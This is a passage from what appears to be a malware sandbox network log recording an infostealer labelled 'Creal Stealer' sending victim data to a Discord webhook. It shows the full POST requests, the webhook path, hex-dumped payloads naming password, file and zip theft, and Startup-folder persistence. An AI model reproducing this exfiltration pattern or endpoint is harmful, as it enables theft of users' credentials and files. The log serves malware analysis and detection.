2024-09-27 16:19:06 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:06 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:06 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=381340887cec11efafbcae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 2 x-ratelimit-reset: 1727453948 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=McIE3SqgLdgOPtBYrzWiGaix1jCSs7wySKaGD%2FERFbfj2jXNs9fbNTYHjosy5%2FRtcvfHEiDlGvpIAtkJ9IFTmCI4b1Z%2BLin3kwNxa83YpVNZSl%2Fhjv48RnuF2Ds6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=381340887cec11efafbcae4c9400efeb1db3f564adc72d3a8d8b446b99df56db4010188797c4edf082d1b3b232b9355b; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:06 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 48 74 59 30 4e 64 75 6b 71 33 39 76 33 74 75 35 43 39 6a 77 78 55 6c 59 4b 6f 73 47 67 50 67 38 4e 48 4a 65 57 6f 6d 55 64 4d 67 2d 31 37 32 37 34 35 33 39 34 36 36 38 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 65 36 63 35 64 34 31 65 30 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=HtY0Ndukq39v3tu5C9jwxUlYKosGgPg8NHJeWomUdMg-1727453946684-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03e6c5d41e0-EWR
2024-09-27 16:19:06 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49757	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:06 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:06 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:19:06 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:06 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=383335be7cec11efa46d469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 1 x-ratelimit-reset: 1727453949 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUsp5IVLl%2Bb6bd5%2BDCRNSiDfH7B8zZjIaYqLDDMGTmJ6pmgOsR00vjq30RzdmORPSdFjd58le4q2A%2BoLaag%2F9NQyNs2ryU6CVc%2BzEmSnVMv7zWaZOOQbsclW7Sww"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=383335be7cec11efa46d469f692a6ab3d563670ae8fa136aed5ba07caf916322885a75166b27f336f2d6c006180c359c; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:06 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 32 54 6d 70 69 68 75 6a 33 33 41 45 58 43 62 36 55 48 47 47 54 4d 73 30 41 47 67 4f 61 7a 4f 32 32 35 4f 52 63 58 35 33 6c 74 55 2d 31 37 32 37 34 35 33 39 34 36 38 39 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 66 62 39 31 30 34 33 37 33 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=2Tmpihuj33AEXCb6UHGGTMs0AGgOazO225ORcX53ltU-1727453946890-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03fb9104373-EWR
2024-09-27 16:19:06 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49759	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:07 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:07 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:07 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:07 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=387716e47cec11efa24492cc3f667719; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 2 x-ratelimit-reset: 1727453949 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2Sqp9Egez%2F%2Fo5xYNm9bkyplS2mGoLogezTeOyzXaqqYr6B1AotK9LqCILgFyM6Eb5U2Mf1xqeF3iOG2rZtcxE%2BsH3O3I8g7TuEQV%2FevMyIJerg1vpr4xTTehySH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=387716e47cec11efa24492cc3f66771902cb7f58775a7929388c906eed3f87ea1e1c590be7e2057e04de1d46fa5ef857; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:07 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 77 55 56 2e 6b 6d 54 54 66 59 73 4f 7a 76 6e 74 46 5f 67 49 41 64 6a 4d 41 6b 47 6e 6d 78 69 6a 66 64 78 72 49 63 30 50 57 4b 77 2d 31 37 32 37 34 35 33 39 34 37 33 33 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 32 37 64 65 31 34 33 39 37 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=wUV.kmTTfYsOzvntF_gIAdjMAkGnmxijfdxrIc0PWKw-1727453947337-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0427de14397-EWR
2024-09-27 16:19:07 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49758	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:07 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:07 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:07 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:07 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=387de5787cec11efa7fd768b656d6a57; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 1 x-ratelimit-reset: 1727453949 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OAyEF1TnZYJlf10iIEZWrrEkISAatWyy0AtnYkkoLN%2FK0eAGpQug%2Buvz3hDMBb1ODtwRKF1bpauqz40RVT2maZLwCL4CRYbyEqFznQfIH9j3YuS3D1azwPp7Fme3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=387de5787cec11efa7fd768b656d6a576e74e38d9f01eabb85bb086eb923249a6a8921914e2be0f9f75ca31e9d4dfefb; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:07 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 73 34 54 78 4b 64 55 64 35 72 33 68 55 37 79 47 77 2e 30 35 7a 41 48 62 43 74 4c 59 6f 66 59 47 61 56 5a 43 42 65 4a 50 52 6d 6f 2d 31 37 32 37 34 35 33 39 34 37 33 38 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 32 38 61 37 66 63 33 33 32 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=s4TxKdUd5r3hU7yGw.05zAHbCtLYofYGaVZCBeJPRmo-1727453947380-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0428a7fc332-EWR
2024-09-27 16:19:07 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49760	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:07 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:07 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:19:07 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:07 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=38981fec7cec11ef80f2469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453950 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4Bek5%2Beth%2FT5N%2F3HReY%2F6GOrUEcz2Iq44Nal6RNGuRKOkV8PP96g7a56e3x3b2njvyI0aPbOXV5XiIc0Vu9UL1JdRtUWc42MJnW5raPso6oWyryoA3RRE%2BaxnYf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=38981fec7cec11ef80f2469f692a6ab36bd029b63b86c8f13de41a76ac6bc55389476b40226a3f1d3a3fa2524e5821f8; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:07 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 47 33 4c 76 32 37 43 50 4d 61 4e 77 47 57 2e 68 55 69 37 50 75 61 2e 51 68 63 6c 41 58 6f 6f 68 52 73 41 67 30 79 41 73 4e 38 2d 31 37 32 37 34 35 33 39 34 37 35 35 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 33 64 62 35 30 34 33 34 33 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=QG3Lv27CPMaNwGW.hUi7Pua.QhclAXoohRsAg0yAsN8-1727453947556-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd043db504343-EWR
2024-09-27 16:19:07 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49761	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:07 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:07 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:08 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:08 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=38e3c7307cec11ef97003ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453950 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCoHAj4r8G6KMIRg74eJaM76feI23vzOfSCCh713JKhj4L3QmWiAkjmFUnAGcHkHjPFGmIWZiECX131fDyykiCv38YUxLC2GBN7QTFGPV%2Bf%2BJ2pSzkf4NTXJ1pj2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=38e3c7307cec11ef97003ec234dfa5632e6efa5728204c9d829a6caae7b0647161891c01be7d76d605dac8b76e61473f; Expires=Wed, 